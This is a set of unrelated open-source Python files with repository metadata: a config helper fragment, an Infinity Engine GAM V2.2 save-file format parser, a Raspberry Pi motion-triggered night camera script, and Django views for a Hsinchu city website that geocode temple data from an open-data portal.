checker.Item(key = ['cache', 'db'],
checkers = [checker.is_str],
default = './cache.db'),
])
except (KeyError, ValueError) as e:
raise e
return Config(_build_attr_dict(d))
def _build_attr_dict(d: Dict) -> AttrDict:
""" Recursively convert all dict to AttrDict. """
r = {}
for k, v in d.items():
if isinstance(v, dict):
r[k] = _build_attr_dict(v)
else:
r[k] = v
return AttrDict(r)
| gpl-3.0 | 1,553,425,372,541,772,800 | 34.340426 | 70 | 0.491872 | false |
gemrb/iesh | infinity/formats/gam_v22.py | 1 | 31222 | # -*-python-*-
# ie_shell.py - Simple shell for Infinity Engine-based game files
# Copyright (C) 2004-2009 by Jaroslav Benkovsky, <[email protected]>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# Conforms to IESDP 18.10.2019
from infinity.format import Format, register_format
class GAM_V22_Format (Format):
header_desc = (
{ 'key': 'signature',
'type': 'STR4',
'off': 0x0000,
'label': 'Signature',
'default': 'GAME' },
{ 'key': 'version',
'type': 'STR4',
'off': 0x0004,
'label': 'Version',
'default': 'V2.2'},
{ 'key': 'game_time',
'type': 'DWORD',
'off': 0x0008,
'label': 'Game time (300 units==1 hour)' },
{ 'key': 'formation',
'type': 'WORD',
'off': 0x000C,
'label': 'Selected formation'},
{ 'key': 'formation_button',
'type': 'WORD',
'off': 0x000E,
'count': 5,
'label': 'Formation button'},
{ 'key': 'gold',
'type': 'DWORD',
'off': 0x0018,
'label': 'Party gold'},
{ 'key': 'pc_cnt0',
'type': 'WORD',
'off': 0x001C,
'label': 'Unknown / PC count'},
{ 'key': 'weather',
'type': 'WORD',
'off': 0x001E,
'mask': { 0x01: 'rain', 0x02: 'snow' },
'label': 'Weather'},
{ 'key': 'pc_off',
'type': 'DWORD',
'off': 0x0020,
'label': 'PC offset'},
{ 'key': 'pc_cnt',
'type': 'DWORD',
'off': 0x0024,
'label': 'PC count (incl. protagonist)'},
{ 'key': 'unknown28',
'type': 'DWORD',
'off': 0x0028,
'label': '(offset to party inventory)'},
{ 'key': 'unknown2C',
'type': 'DWORD',
'off': 0x002C,
'label': '(count of party inventory)'},
{ 'key': 'npc_off',
'type': 'DWORD',
'off': 0x0030,
'label': 'NPC offset'},
{ 'key': 'npc_cnt',
'type': 'DWORD',
'off': 0x0034,
'label': 'NPC count'},
{ 'key': 'global_off',
'type': 'DWORD',
'off': 0x0038,
'label': 'GLOBAL variables offset'},
{ 'key': 'global_cnt',
'type': 'DWORD',
'off': 0x003C,
'label': 'GLOBAL variables count'},
{ 'key': 'main_area',
'type': 'RESREF',
'off': 0x0040,
'label': 'Main area'},
{ 'key': 'familiar_extra_off',
'type': 'DWORD',
'off': 0x0048,
'label': 'Unknown / Familiar extra offset'},
{ 'key': 'journal_entry_cnt',
'type': 'DWORD',
'off': 0x004C,
'label': 'Journal entries count'},
{ 'key': 'journal_entry_off',
'type': 'DWORD',
'off': 0x0050,
'label': 'Journal entries offset'},
{ 'key': 'reputation',
'type': 'DWORD',
'off': 0x0054,
'label': 'Party reputation (*10)'},
{ 'key': 'current_area',
'type': 'RESREF',
'off': 0x0058,
'label': 'Current area'},
{ 'key': 'gui_flags',
'type': 'DWORD',
'off': 0x0060,
'mask': {0x01: 'party_ai_enabled',
0x02: 'text_window_size1',
0x04: 'text_window_size2',
0x08: 'unknown bit3',
0x10: 'hide_gui',
0x20: 'hide_options',
0x40: 'hide_portraits',
0x80: 'hide_automap_notes' },
'label': 'GUI flags'},
{ 'key': 'loading_progress',
'type': 'DWORD',
'off': 0x0064,
'enum': {0: 'restrict_xp_to_bg1_limit',
1: 'restrict_xp_to_totsc_limit',
2: 'restrict_xp_to_soa_limit',
3: 'XNEWAREA.2DA processing to be done',
4: 'XNEWAREA.2DA processing complete',
5: 'TOB active'},
'label': 'Unknown / Loading progress'},
{ 'key': 'familiar_off',
'type': 'DWORD',
'off': 0x0068,
'label': 'Familiar info offset'},
{ 'key': 'stored_location_off',
'type': 'DWORD',
'off': 0x006C,
'label': 'Stored locations offset'},
{ 'key': 'stored_location_cnt',
'type': 'DWORD',
'off': 0x0070,
'label': 'Stored locations count'},
{ 'key': 'game_time',
'type': 'DWORD',
'off': 0x0074,
'label': 'Game time (real seconds)'},
{ 'key': 'pocket_plane_location_off',
'type': 'DWORD',
'off': 0x0078,
'label': 'Pocket plane locations offset'},
{ 'key': 'pocket_plane_location_cnt',
'type': 'DWORD',
'off': 0x007C,
'label': 'Pocket plane locations count'},
{ 'key': 'unknown80',
'type': 'BYTES',
'off': 0x0080,
'size': 52,
'label': 'Unknown 80'},
)
npc_desc = (
{ 'key': 'character_selection',
'type': 'WORD',
'off': 0x0000,
'enum': {0: 'not selected', 1: 'selected', 0x8000: 'dead'},
'label': 'Character selection'},
{ 'key': 'party_order',
'type': 'WORD',
'off': 0x0002,
'label': 'Party order'},
{ 'key': 'cre_off',
'type': 'DWORD',
'off': 0x0004,
'label': 'CRE offset'},
{ 'key': 'cre_size',
'type': 'DWORD',
'off': 0x0008,
'label': 'CRE size'},
{ 'key': 'character_name',
'type': 'STR8',
'off': 0x000C,
'size': 8,
'label': 'Character name'},
{ 'key': 'orientation',
'type': 'DWORD',
'off': 0x0014,
'label': 'Orientation'},
{ 'key': 'current_area',
'type': 'RESREF',
'off': 0x0018,
'label': 'Current area'},
{ 'key': 'x',
'type': 'WORD',
'off': 0x0020,
'label': 'X coordinate'},
{ 'key': 'y',
'type': 'WORD',
'off': 0x0022,
'label': 'Y coordinate'},
{ 'key': 'view_x',
'type': 'WORD',
'off': 0x0024,
'label': 'Viewing rectange X coordinate'},
{ 'key': 'view_y',
'type': 'WORD',
'off': 0x0026,
'label': 'Viewing rectangle Y coordinate'},
{ 'key': 'modal_action',
'type': 'WORD',
'off': 0x0028,
'label': 'Modal action'},
{ 'key': 'happiness',
'type': 'WORD',
'off': 0x002A,
'label': 'Happiness'},
{ 'key': 'num_times_interacted_npc_count',
'type': 'DWORD',
'off': 0x002C,
'count': 24,
'label': 'Num times interacted NPC count (unused)' },
{ 'key': 'quick_weapon_slot_index',
'type': 'WORD',
'off': 0x008C,
'count': 8,
'label': 'Index into slots.ids for main Quick Weapon or offhand, interchanging (FFFF=none)' },
{ 'key': 'quick_slot_usable',
'type': 'WORD',
'off': 0x009C,
'count': 8,
'label': 'Is the quick weapon slot usable?' },
{ 'key': 'quick_spell_resource',
'type': 'RESREF',
'off': 0x00AC,
'count': 9,
'label': 'Quick spell resource' },
{ 'key': 'quick_spell_class',
'type': 'BYTE',
'off': 0x00F4,
'count': 9,
'label': 'Quick spell class' },
{ 'key': 'quick_spell_unknown',
'type': 'BYTE',
'off': 0x00FD,
'count': 1,
'label': '(Quick spell) unknown' },
{ 'key': 'quick_item_slot_index',
'type': 'WORD',
'off': 0x00FE,
'count': 3,
'label': 'Index into slots.ids for Quick Item (FFFF=none)' },
{ 'key': 'quick_item_slot_ability',
'type': 'WORD',
'off': 0x0104,
'count': 3,
'label': 'Quick Item slot usable' },
{ 'key': 'quick_innate',
'type': 'RESREF',
'off': 0x010A,
'count': 9,
'label': 'Quick innate' },
{ 'key': 'quick_song',
'type': 'RESREF',
'off': 0x0152,
'count': 9,
'label': 'Quick song' },
{ 'key': 'quick_slot',
'type': 'RESREF',
'off': 0x019A,
'count': 9,
'label': 'Quick slot' },
{ 'key': 'name',
'type': 'STR32',
'off': 0x01BE,
'label': 'Name' },
{ 'key': 'talkcount',
'type': 'DWORD',
'off': 0x01C2,
'label': 'Talkcount' },
{ 'key': 'stats',
'type': 'BYTES',
'off': 0x01C6,
'size': 116,
'label': 'Stats' },
{ 'key': 'soundset',
'type': 'RESREF',
'off': 0x023A,
'label': 'Sound set' },
{ 'key': 'voiceset',
'type': 'STR32',
'off': 0x0242,
'label': 'Voice set' },
{ 'key': 'unknown_1',
'type': 'DWORD',
'off': 0x0262,
'label': 'Unknown 1' },
{ 'key': 'unknown_2',
'type': 'DWORD',
'off': 0x0266,
'label': 'Unknown 2' },
{ 'key': 'unknown_3',
'type': 'DWORD',
'off': 0x026A,
'label': 'Unknown 3' },
{ 'key': 'expertise',
'type': 'DWORD',
'off': 0x026E,
'label': 'Expertise' },
{ 'key': 'power_attack',
'type': 'DWORD',
'off': 0x0272,
'label': 'Power attack' },
{ 'key': 'arterial_strike',
'type': 'DWORD',
'off': 0x0276,
'label': 'Arterial Strike' },
{ 'key': 'hamstring',
'type': 'DWORD',
'off': 0x027A,
'label': 'Hamstring' },
{ 'key': 'rapid_shot',
'type': 'DWORD',
'off': 0x027E,
'label': 'Rapid Shot' },
{ 'key': 'unknown_4',
'type': 'DWORD',
'off': 0x0282,
'label': 'Unknown 4' },
{ 'key': 'unknown_5',
'type': 'BYTES',
'size': 3,
'off': 0x0286,
'label': 'Unknown 5' },
{ 'key': 'selected_w_slot',
'type': 'WORD',
'off': 0x0289,
'label': 'Selected weapon slot' },
{ 'key': 'unknown_6',
'type': 'BYTES',
'size': 153,
'off': 0x028B,
'label': 'Unknown 6' },
)
pc_desc = npc_desc
global_desc = (
{ 'key': 'name',
'type': 'STR32',
'off': 0x0000,
'label': 'Variable name' },
{ 'key': 'type',
'type': 'WORD',
'off': 0x0020,
# TODO: add mask: (bit 0: int, bit 1: float, bit 2: script name, bit 3: resref, bit 4: strref, bit 5: dword)
'label': 'Type' },
{ 'key': 'refval',
'type': 'WORD',
'off': 0x0022,
'label': 'Ref value' },
{ 'key': 'dwval',
'type': 'DWORD',
'off': 0x0024,
'label': 'DWORD value' },
{ 'key': 'intval',
'type': 'DWORD',
'off': 0x0028,
'label': 'INT value' },
{ 'key': 'dblval',
'type': 'BYTES',
'off': 0x002c,
'size': 8,
'label': 'DOUBLE value' },
{ 'key': 'scrnameval',
'type': 'BYTES',
'off': 0x0033,
'size': 32,
'label': 'Script name value' },
)
journal_entry_desc = (
{ 'key': 'text',
'type': 'STRREF',
'off': 0x0000,
'label': 'Journal text' },
{ 'key': 'time',
'type': 'DWORD',
'off': 0x0004,
'label': 'Time (secs)' },
{ 'key': 'current_chapter',
'type': 'BYTE',
'off': 0x0008,
'label': 'Current chapter number' },
{ 'key': 'unknown09',
'type': 'BYTE',
'off': 0x0009,
'label': 'Unknown 09' },
{ 'key': 'section',
'type': 'BYTE',
'off': 0x000A,
'mask': { 0x01: 'quests', 0x02: 'Completed quests', 0x04: 'Journal info' },
'label': 'Journal section' },
{ 'key': 'location_flag',
'type': 'BYTE',
'off': 0x000B,
'enum': { 0x1F: 'external TOT/TOH', 0xFF: 'internal TLK' },
'label': 'Location flag' },
)
familiar_info_desc = (
{ 'key': 'lg_familiar',
'type': 'RESREF',
'off': 0x0000,
'label': 'Lawful familiar' },
{ 'key': 'ln_familiar',
'type': 'RESREF',
'off': 0x0008,
'label': 'Lawful neutral familiar' },
{ 'key': 'le_familiar',
'type': 'RESREF',
'off': 0x0010,
'label': 'Lawful evil familiar' },
{ 'key': 'ng_familiar',
'type': 'RESREF',
'off': 0x0018,
'label': 'Neutral good familiar' },
{ 'key': 'nn_familiar',
'type': 'RESREF',
'off': 0x0020,
'label': 'True neutral familiar' },
{ 'key': 'ne_familiar',
'type': 'RESREF',
'off': 0x0028,
'label': 'Neutral evil familiar' },
{ 'key': 'cg_familiar',
'type': 'RESREF',
'off': 0x0030,
'label': 'Chaotic familiar' },
{ 'key': 'cn_familiar',
'type': 'RESREF',
'off': 0x0038,
'label': 'Chaotic neutral familiar' },
{ 'key': 'ce_familiar',
'type': 'RESREF',
'off': 0x0040,
'label': 'Chaotic evil familiar' },
{ 'key': 'unknown48',
'type': 'DWORD',
'off': 0x0048,
'label': 'Unknown 48' },
{ 'key': 'lg_1_familiar_cnt',
'type': 'DWORD',
'off': 0x004C,
'label': 'LG level 1 familiar count' },
{ 'key': 'lg_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0050,
'label': 'LG level 2 familiar count' },
{ 'key': 'lg_3_familiar_cnt',
'type': 'DWORD',
'off': 0x0054,
'label': 'LG level 3 familiar count' },
{ 'key': 'lg_4_familiar_cnt',
'type': 'DWORD',
'off': 0x0058,
'label': 'LG level 4 familiar count' },
{ 'key': 'lg_5_familiar_cnt',
'type': 'DWORD',
'off': 0x005C,
'label': 'LG level 5 familiar count' },
{ 'key': 'lg_6_familiar_cnt',
'type': 'DWORD',
'off': 0x0060,
'label': 'LG level 6 familiar count' },
{ 'key': 'lg_7_familiar_cnt',
'type': 'DWORD',
'off': 0x0064,
'label': 'LG level 7 familiar count' },
{ 'key': 'lg_8_familiar_cnt',
'type': 'DWORD',
'off': 0x0068,
'label': 'LG level 8 familiar count' },
{ 'key': 'lg_9_familiar_cnt',
'type': 'DWORD',
'off': 0x006C,
'label': 'LG level 9 familiar count' },
{ 'key': 'ln_1_familiar_cnt',
'type': 'DWORD',
'off': 0x0070,
'label': 'LN level 1 familiar count' },
{ 'key': 'ln_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0074,
'label': 'LN level 2 familiar count' },
{ 'key': 'ln_3_familiar_cnt',
'type': 'DWORD',
'off': 0x0078,
'label': 'LN level 3 familiar count' },
{ 'key': 'ln_4_familiar_cnt',
'type': 'DWORD',
'off': 0x007C,
'label': 'LN level 4 familiar count' },
{ 'key': 'ln_5_familiar_cnt',
'type': 'DWORD',
'off': 0x0080,
'label': 'LN level 5 familiar count' },
{ 'key': 'ln_6_familiar_cnt',
'type': 'DWORD',
'off': 0x0084,
'label': 'LN level 6 familiar count' },
{ 'key': 'ln_7_familiar_cnt',
'type': 'DWORD',
'off': 0x0088,
'label': 'LN level 7 familiar count' },
{ 'key': 'ln_8_familiar_cnt',
'type': 'DWORD',
'off': 0x008C,
'label': 'LN level 8 familiar count' },
{ 'key': 'ln_9_familiar_cnt',
'type': 'DWORD',
'off': 0x0090,
'label': 'LN level 9 familiar count' },
{ 'key': 'cg_1_familiar_cnt',
'type': 'DWORD',
'off': 0x0094,
'label': 'CG level 1 familiar count' },
{ 'key': 'cg_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0098,
'label': 'CG level 2 familiar count' },
{ 'key': 'cg_3_familiar_cnt',
'type': 'DWORD',
'off': 0x009C,
'label': 'CG level 3 familiar count' },
{ 'key': 'cg_4_familiar_cnt',
'type': 'DWORD',
'off': 0x00A0,
'label': 'CG level 4 familiar count' },
{ 'key': 'cg_5_familiar_cnt',
'type': 'DWORD',
'off': 0x00A4,
'label': 'CG level 5 familiar count' },
{ 'key': 'cg_6_familiar_cnt',
'type': 'DWORD',
'off': 0x00A8,
'label': 'CG level 6 familiar count' },
{ 'key': 'cg_7_familiar_cnt',
'type': 'DWORD',
'off': 0x00AC,
'label': 'CG level 7 familiar count' },
{ 'key': 'cg_8_familiar_cnt',
'type': 'DWORD',
'off': 0x00B0,
'label': 'CG level 8 familiar count' },
{ 'key': 'cg_9_familiar_cnt',
'type': 'DWORD',
'off': 0x00B4,
'label': 'CG level 9 familiar count' },
{ 'key': 'ng_1_familiar_cnt',
'type': 'DWORD',
'off': 0x00B8,
'label': 'NG level 1 familiar count' },
{ 'key': 'ng_2_familiar_cnt',
'type': 'DWORD',
'off': 0x00BC,
'label': 'NG level 2 familiar count' },
{ 'key': 'ng_3_familiar_cnt',
'type': 'DWORD',
'off': 0x00C0,
'label': 'NG level 3 familiar count' },
{ 'key': 'ng_4_familiar_cnt',
'type': 'DWORD',
'off': 0x00C4,
'label': 'NG level 4 familiar count' },
{ 'key': 'ng_5_familiar_cnt',
'type': 'DWORD',
'off': 0x00C8,
'label': 'NG level 5 familiar count' },
{ 'key': 'ng_6_familiar_cnt',
'type': 'DWORD',
'off': 0x00CC,
'label': 'NG level 6 familiar count' },
{ 'key': 'ng_7_familiar_cnt',
'type': 'DWORD',
'off': 0x00D0,
'label': 'NG level 7 familiar count' },
{ 'key': 'ng_8_familiar_cnt',
'type': 'DWORD',
'off': 0x00D4,
'label': 'NG level 8 familiar count' },
{ 'key': 'ng_9_familiar_cnt',
'type': 'DWORD',
'off': 0x00D8,
'label': 'NG level 9 familiar count' },
{ 'key': 'tn_1_familiar_cnt',
'type': 'DWORD',
'off': 0x00DC,
'label': 'TN level 1 familiar count' },
{ 'key': 'tn_2_familiar_cnt',
'type': 'DWORD',
'off': 0x00E0,
'label': 'TN level 2 familiar count' },
{ 'key': 'tn_3_familiar_cnt',
'type': 'DWORD',
'off': 0x00E4,
'label': 'TN level 3 familiar count' },
{ 'key': 'tn_4_familiar_cnt',
'type': 'DWORD',
'off': 0x00E8,
'label': 'TN level 4 familiar count' },
{ 'key': 'tn_5_familiar_cnt',
'type': 'DWORD',
'off': 0x00EC,
'label': 'TN level 5 familiar count' },
{ 'key': 'tn_6_familiar_cnt',
'type': 'DWORD',
'off': 0x00F0,
'label': 'TN level 6 familiar count' },
{ 'key': 'tn_7_familiar_cnt',
'type': 'DWORD',
'off': 0x00F4,
'label': 'TN level 7 familiar count' },
{ 'key': 'tn_8_familiar_cnt',
'type': 'DWORD',
'off': 0x00F8,
'label': 'TN level 8 familiar count' },
{ 'key': 'tn_9_familiar_cnt',
'type': 'DWORD',
'off': 0x00FC,
'label': 'TN level 9 familiar count' },
{ 'key': 'ne_1_familiar_cnt',
'type': 'DWORD',
'off': 0x0100,
'label': 'NE level 1 familiar count' },
{ 'key': 'ne_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0104,
'label': 'NE level 2 familiar count' },
{ 'key': 'ne_3_familiar_cnt',
'type': 'DWORD',
'off': 0x0108,
'label': 'NE level 3 familiar count' },
{ 'key': 'ne_4_familiar_cnt',
'type': 'DWORD',
'off': 0x010C,
'label': 'NE level 4 familiar count' },
{ 'key': 'ne_5_familiar_cnt',
'type': 'DWORD',
'off': 0x0110,
'label': 'NE level 5 familiar count' },
{ 'key': 'ne_6_familiar_cnt',
'type': 'DWORD',
'off': 0x0114,
'label': 'NE level 6 familiar count' },
{ 'key': 'ne_7_familiar_cnt',
'type': 'DWORD',
'off': 0x0118,
'label': 'NE level 7 familiar count' },
{ 'key': 'ne_8_familiar_cnt',
'type': 'DWORD',
'off': 0x011C,
'label': 'NE level 8 familiar count' },
{ 'key': 'ne_9_familiar_cnt',
'type': 'DWORD',
'off': 0x0120,
'label': 'NE level 9 familiar count' },
{ 'key': 'le_1_familiar_cnt',
'type': 'DWORD',
'off': 0x0124,
'label': 'LE level 1 familiar count' },
{ 'key': 'le_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0128,
'label': 'LE level 2 familiar count' },
{ 'key': 'le_3_familiar_cnt',
'type': 'DWORD',
'off': 0x012C,
'label': 'LE level 3 familiar count' },
{ 'key': 'le_4_familiar_cnt',
'type': 'DWORD',
'off': 0x0130,
'label': 'LE level 4 familiar count' },
{ 'key': 'le_5_familiar_cnt',
'type': 'DWORD',
'off': 0x0134,
'label': 'LE level 5 familiar count' },
{ 'key': 'le_6_familiar_cnt',
'type': 'DWORD',
'off': 0x0138,
'label': 'LE level 6 familiar count' },
{ 'key': 'le_7_familiar_cnt',
'type': 'DWORD',
'off': 0x013C,
'label': 'LE level 7 familiar count' },
{ 'key': 'le_8_familiar_cnt',
'type': 'DWORD',
'off': 0x0140,
'label': 'LE level 8 familiar count' },
{ 'key': 'le_9_familiar_cnt',
'type': 'DWORD',
'off': 0x0144,
'label': 'LE level 9 familiar count' },
{ 'key': 'cn_1_familiar_cnt',
'type': 'DWORD',
'off': 0x0148,
'label': 'CN level 1 familiar count' },
{ 'key': 'cn_2_familiar_cnt',
'type': 'DWORD',
'off': 0x014C,
'label': 'CN level 2 familiar count' },
{ 'key': 'cn_3_familiar_cnt',
'type': 'DWORD',
'off': 0x0150,
'label': 'CN level 3 familiar count' },
{ 'key': 'cn_4_familiar_cnt',
'type': 'DWORD',
'off': 0x0154,
'label': 'CN level 4 familiar count' },
{ 'key': 'cn_5_familiar_cnt',
'type': 'DWORD',
'off': 0x0158,
'label': 'CN level 5 familiar count' },
{ 'key': 'cn_6_familiar_cnt',
'type': 'DWORD',
'off': 0x015C,
'label': 'CN level 6 familiar count' },
{ 'key': 'cn_7_familiar_cnt',
'type': 'DWORD',
'off': 0x0160,
'label': 'CN level 7 familiar count' },
{ 'key': 'cn_8_familiar_cnt',
'type': 'DWORD',
'off': 0x0164,
'label': 'CN level 8 familiar count' },
{ 'key': 'cn_9_familiar_cnt',
'type': 'DWORD',
'off': 0x0168,
'label': 'CN level 9 familiar count' },
{ 'key': 'ce_1_familiar_cnt',
'type': 'DWORD',
'off': 0x016C,
'label': 'CE level 1 familiar count' },
{ 'key': 'ce_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0170,
'label': 'CE level 2 familiar count' },
{ 'key': 'ce_3_familiar_cnt',
'type': 'DWORD',
'off': 0x0174,
'label': 'CE level 3 familiar count' },
{ 'key': 'ce_4_familiar_cnt',
'type': 'DWORD',
'off': 0x0178,
'label': 'CE level 4 familiar count' },
{ 'key': 'ce_5_familiar_cnt',
'type': 'DWORD',
'off': 0x017C,
'label': 'CE level 5 familiar count' },
{ 'key': 'ce_6_familiar_cnt',
'type': 'DWORD',
'off': 0x0180,
'label': 'CE level 6 familiar count' },
{ 'key': 'ce_7_familiar_cnt',
'type': 'DWORD',
'off': 0x0184,
'label': 'CE level 7 familiar count' },
{ 'key': 'ce_8_familiar_cnt',
'type': 'DWORD',
'off': 0x0188,
'label': 'CE level 8 familiar count' },
{ 'key': 'ce_9_familiar_cnt',
'type': 'DWORD',
'off': 0x018C,
'label': 'CE level 9 familiar count' },
)
stored_location_desc = (
{ 'key': 'area',
'type': 'RESREF',
'off': 0x0000,
'label': 'Area' },
{ 'key': 'x',
'type': 'WORD',
'off': 0x0008,
'label': 'X coordinate' },
{ 'key': 'y',
'type': 'WORD',
'off': 0x000A,
'label': 'Y coordinate' },
)
pocket_plane_location_desc = stored_location_desc
def __init__ (self):
Format.__init__ (self)
self.expect_signature = 'GAME'
self.pc_list = []
self.npc_list = []
self.global_list = []
self.journal_entry_list = []
self.stored_location_list = []
self.pocket_plane_location_list = []
def read (self, stream):
self.read_header (stream)
self.read_list (stream, 'pc')
self.read_list (stream, 'npc')
self.read_list (stream, 'global')
self.read_list (stream, 'journal_entry')
self.read_list (stream, 'stored_location')
self.read_list (stream, 'pocket_plane_location')
obj = {}
self.read_struc (stream, self.header['familiar_off'], self.familiar_info_desc, obj)
self.familiar_info = obj
# FIXME: familiar info
def update (self):
off = self.size_struc (self.header_desc)
self.header['pc_cnt'] = len (self.pc_list)
self.header['pc_off'] = off
off += self.size_struc (self.pc_desc) * len (self.pc_list)
pass
def write (self, stream):
self.write_header (stream)
off = self.write_list (stream, off, 'actor')
raise RuntimeError ("Not implemented")
def printme (self):
self.print_header ()
self.print_list ('pc')
self.print_list ('npc')
self.print_list ('global')
self.print_list ('journal_entry')
self.print_list ('stored_location')
self.print_list ('pocket_plane_location')
self.print_struc (self.familiar_info, self.familiar_info_desc)
register_format (GAM_V22_Format, signature='GAMEV2.2', extension='GAM', name=('GAM', 'GAME'), type=0x3f5)
| gpl-2.0 | 2,371,619,244,215,804,400 | 28.877512 | 123 | 0.394818 | false |
jmcallister47/trailcam | night/motion-camera.py | 1 | 1673 | #!/usr/bin/env python
'''Script that manages motion sensor, camera module and light
When motion is detected, turn on infrared light, take and save picture, turn off light
Maximum of one picture every 4 seconds'''
from gpiozero import MotionSensor
import subprocess
from datetime import datetime
from time import sleep
import RPi.GPIO as GPIO
def main():
sensor = MotionSensor(4)
writeToLogFile("STARTED NIGHT MODE AT " + str(datetime.now()))
GPIO.setmode(GPIO.BCM)
GPIO.setup(5, GPIO.OUT) #setup light trigger
while True:
if sensor.motion_detected:
turnOnLights()
print "Lights on"
sleep(1)
takePicture()
print("Take picture")
#sleep(3)
turnOffLights()
print("Turn off lights")
sleep(3)
writeToLogFile("Took one picture at " + str(datetime.now()))
'''Turns on IR Lights indefinetely'''
def turnOnLights():
GPIO.output(5, 0)
'''Turns off all lights (IR and LED)'''
def turnOffLights():
GPIO.output(5, 1)
'''Takes a picture and saves it with timestamp'''
def takePicture():
now = datetime.now()
timestamp = str(now.month).zfill(2) + "-" + str(now.day).zfill(2) + "-" + str(now.year) + "-" + \
str(now.hour).zfill(2) + ":" + str(now.minute).zfill(2) + ":" + str(now.second).zfill(2)
filename = timestamp + "-night.jpg"
subprocess.call(["sudo", "raspistill", "-o", "/home/pi/trailcam/tmp/" + filename])
def writeToLogFile(arg):
file = open("/home/pi/trailcam/night/log.txt", "a");
file.write(arg + "\n")
file.close();
if __name__ == "__main__":
main()
| gpl-3.0 | -4,917,927,044,453,764,000 | 31.803922 | 104 | 0.608488 | false |
kaochiuan/HsinchuCityWebsite | HsinchuCityWebsite/HsinchuCityWebsite/app/views.py | 1 | 19767 | """
Definition of views.
"""
from django.shortcuts import render
from django.http import HttpResponse
from django.http import HttpRequest
from django.template import RequestContext
from datetime import datetime
from datetime import date
from django.http.response import HttpResponse
import urllib.request
import json
import urllib
from urllib.request import Request
from app.models import TempleInfo, TempleManager, CultureActiviyInfo, CityNewsItem, AnamialHospitalReputation
from app.templateModels import *
from django.contrib.sites import requests
from django.views.decorators.csrf import csrf_protect
from django.core import serializers
from app.ReputationService import ReputationService
from django.shortcuts import redirect
def favicon_redirect(request):
return redirect('/static/app/images/favi.ico')
def home(request):
"""Renders the home page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/index.html',
context_instance = RequestContext(request,
{
'title':'首頁',
'year':datetime.now().year,
}))
def contact(request):
"""Renders the contact page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/contact.html',
context_instance = RequestContext(request,
{
'title':'Contact',
'message':'Your contact page.',
'year':datetime.now().year,
}))
def about(request):
"""Renders the about page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/about.html',
context_instance = RequestContext(request,
{
'title':'與Opendata平台同步資料',
'message':'Application data sync',
'year':datetime.now().year,
}))
def templeMaps(request):
assert isinstance(request, HttpRequest)
regions = TempleInfo.objects.getDistinctRegion()
belief = TempleInfo.objects.getDistinctReligiousBelief()
regionLst = []
beliefLst = []
for r in regions:
regionLst.append(r.locateRegion)
for b in belief:
beliefLst.append(b.religiousBelief)
regionLst = set(regionLst)
beliefLst = set(beliefLst)
return render(request,
'app/templeMaps.html',
context_instance = RequestContext(request,
{
'title':'求人不如求神',
'regions':regionLst,
'belief':beliefLst,
}))
@csrf_protect
def filterTemple(request):
assert isinstance(request, HttpRequest)
region = request.POST['region']
belief = request.POST['belief']
filterTemples = TempleInfo.objects.filterByDetail(region,belief)
data = serializers.serialize("json", filterTemples, fields=('name','masterGod','address','latitude','longitude'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "templeInfo": decoded}),
content_type="application/json")
def allMyGodsInHsinchu(request):
assert isinstance(request, HttpRequest)
req = Request("http://opendata.hccg.gov.tw/dataset/480911dd-6eea-4f97-a7e8-334b32cc8f6b/resource/ee12c072-e8aa-4be1-8179-f1c9606198f3/download/20150304091340575.json")
try:
response = urllib.request.urlopen(req)
ur = response.readall().decode('utf-8-sig')
j_obj = json.loads(ur)
templeLst = []
for jsonObj in j_obj:
address = jsonObj[u"寺廟所在地"]
success, lat, lng = AddressToLatlng(address)
if success == True:
wgs84locate = latlng(lat, lng)
loc = location(address,wgs84locate)
else:
wgs84locate = latlng(0.0, 0.0)
loc = location(address,wgs84locate)
g = temple(jsonObj[u"寺廟名稱"],jsonObj[u"地區"],jsonObj[u"主祀神像"],jsonObj[u"教別"],jsonObj[u"組織型態"],loc,jsonObj[u"寺廟電話 1"],jsonObj[u"寺廟電話 2"])
templeLst.append(g)
except urllib.error.HTTPError as e:
print(e.code)
print(e.read().decode("utf-8-sig"))
return render(request,
'app/allmygods.html',
context_instance = RequestContext(request,
{
'title':'求人不如求神',
'gods':templeLst,
}))
def address_to_location(request):
assert isinstance(request, HttpRequest)
#address = request.POST['address']
#if address == "":
try:
success, lat, lng = AddressToLatlng(address)
if success == True:
return HttpResponse(json.dumps({"status": "OK", "lat": lat, "lng": lng}),
content_type="application/json")
else:
return HttpResponse(json.dumps({"status": "Fail", "lat": lat, "lng": lng}),
content_type="application/json")
except urllib.error.HTTPError as e:
print(e.code)
print(e.read().decode("utf-8-sig"))
return HttpResponse(json.dumps({"status": "Fail", "lat": lat, "lng": lng}),
content_type="application/json")
def AddressToLatlng(address):
encodeAddress = urllib.parse.urlencode({'address': address})
url = "https://maps.googleapis.com/maps/api/geocode/json?%s" % encodeAddress
req = Request(url)
response = urllib.request.urlopen(req).readall().decode('utf-8')
jsongeocode = json.loads(response)
longitude = 0.0
latitude = 0.0
success = False
if jsongeocode['status'] == "OK":
success = True
latitude = jsongeocode['results'][0]['geometry']['location']['lat']
longitude = jsongeocode['results'][0]['geometry']['location']['lng']
return success, latitude, longitude
@csrf_protect
def syncTempleInfo(request):
assert isinstance(request, HttpRequest)
req = Request("http://opendata.hccg.gov.tw/dataset/480911dd-6eea-4f97-a7e8-334b32cc8f6b/resource/ee12c072-e8aa-4be1-8179-f1c9606198f3/download/20150304091340575.json")
templeLst = []
success = False
try:
response = urllib.request.urlopen(req)
ur = response.readall().decode('utf-8-sig')
j_obj = json.loads(ur)
for jsonObj in j_obj:
address = jsonObj[u"寺廟所在地"]
success, lat, lng = AddressToLatlng(address)
if success == True:
wgs84locate = latlng(lat, lng)
loc = location(address,wgs84locate)
else:
